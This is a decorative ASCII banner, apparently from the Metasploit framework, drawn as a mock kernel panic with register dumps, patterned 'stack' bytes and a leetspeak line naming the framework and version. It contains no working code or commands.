eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
%bld
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
%clr
%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr
Aiee, Killing Interrupt handler
%redKernel panic: Attempted to kill the idle task!
In swapper task - not syncing%clr

Some files were not shown because too many files have changed in this diff